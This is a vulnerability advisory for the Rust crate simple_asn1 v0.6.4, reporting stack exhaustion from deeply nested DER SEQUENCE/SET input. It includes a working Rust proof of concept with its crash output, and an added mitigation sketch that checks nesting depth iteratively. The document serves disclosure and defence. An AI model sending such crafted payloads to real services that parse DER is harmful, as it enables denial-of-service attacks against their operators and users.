Summary
simple_asn1 v0.6.4 recursively parses nested DER structures through from_der_() without enforcing a recursion depth limit.
An attacker-controlled DER payload containing deeply nested SEQUENCE (0x30) or SET (0x31) objects can trigger stack exhaustion and abort the process.
In the tested environment, the crash occurs around nesting depth 1338 with a payload size of approximately 5 KB.
PoC
use simple_asn1::from_der;

// Encode a DER length: short form below 128, long form otherwise.
fn encode_len(len: usize) -> Vec<u8> {
    if len < 128 {
        return vec![len as u8];
    }
    let mut bytes = Vec::new();
    let mut n = len;
    while n > 0 {
        bytes.push((n & 0xff) as u8);
        n >>= 8;
    }
    bytes.reverse();
    let mut out = vec![0x80 | (bytes.len() as u8)];
    out.extend(bytes);
    out
}

// Wrap a NULL (05 00) in `depth` layers of the given constructed tag.
fn make_nested(depth: usize, tag: u8) -> Vec<u8> {
    let mut data = vec![0x05, 0x00];
    for _ in 0..depth {
        let mut obj = vec![tag];
        obj.extend(encode_len(data.len()));
        obj.extend(data);
        data = obj;
    }
    data
}

fn main() {
    // 1338 nested SEQUENCEs: the depth at which the crash was observed.
    let payload = make_nested(1338, 0x30);
    println!("Payload size: {}", payload.len());
    let _ = from_der(&payload);
}
Output
Payload size: 5185
thread 'main' has overflowed its stack
fatal runtime error: stack overflow, aborting
Aborted (core dumped)
Impact
Applications parsing attacker-controlled DER data through simple_asn1::from_der() may be vulnerable to denial of service via stack exhaustion and process abort.
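Mitigation sketch, added here as an example and not taken from the advisory or from simple_asn1: an iterative pre-parse check that tracks DER nesting on a heap-allocated stack and rejects input nested deeper than a caller-chosen limit before it is passed to from_der(). The names der_depth_within and sample and the limit of 16 are assumptions, and counting every constructed TLV as one level is broader than the SEQUENCE/SET case described above.

```rust
/// Added example (not simple_asn1 code): walk DER iteratively and return the
/// maximum nesting depth, or Err if malformed or nested deeper than `limit`.
pub fn der_depth_within(data: &[u8], limit: usize) -> Result<usize, &'static str> {
    let mut ends: Vec<usize> = Vec::new(); // end offsets of open containers (heap)
    let (mut pos, mut max_depth) = (0usize, 0usize);
    while pos < data.len() {
        while ends.last() == Some(&pos) { ends.pop(); } // containers ending here
        let bound = ends.last().copied().unwrap_or(data.len());
        let tag = data[pos];
        let mut i = pos + 1;
        if tag & 0x1f == 0x1f {
            // High-tag-number form: skip continuation bytes of the tag.
            while *data.get(i).ok_or("truncated tag")? & 0x80 != 0 {
                i += 1;
            }
            i += 1;
        }
        let first = *data.get(i).ok_or("truncated length")?;
        i += 1;
        let len = if first < 0x80 {
            first as usize
        } else {
            let n = (first & 0x7f) as usize; // long form: n length bytes follow
            if n == 0 || n > 4 { return Err("unsupported length"); }
            let bytes = data.get(i..i + n).ok_or("truncated length")?;
            i += n;
            bytes.iter().fold(0usize, |acc, b| (acc << 8) | *b as usize)
        };
        let end = i.checked_add(len).filter(|e| *e <= bound).ok_or("length exceeds container")?;
        if tag & 0x20 != 0 {
            ends.push(end); // constructed: descend into its content
            max_depth = max_depth.max(ends.len());
            if ends.len() > limit { return Err("nesting too deep"); }
            pos = i;
        } else {
            pos = end; // primitive: skip its content
        }
    }
    Ok(max_depth)
}

// Constructed sample: `depth` nested SEQUENCEs around a NULL (valid for depth <= 60).
fn sample(depth: usize) -> Vec<u8> {
    (0..depth).fold(vec![0x05, 0x00], |inner, _| [vec![0x30, inner.len() as u8], inner].concat())
}

fn main() {
    println!("{:?} {:?}", der_depth_within(&sample(8), 16), der_depth_within(&sample(40), 16));
}
```

Call from_der() only when the check returns Ok; the walker's memory use is bounded by the limit, so the check itself cannot be driven into deep recursion.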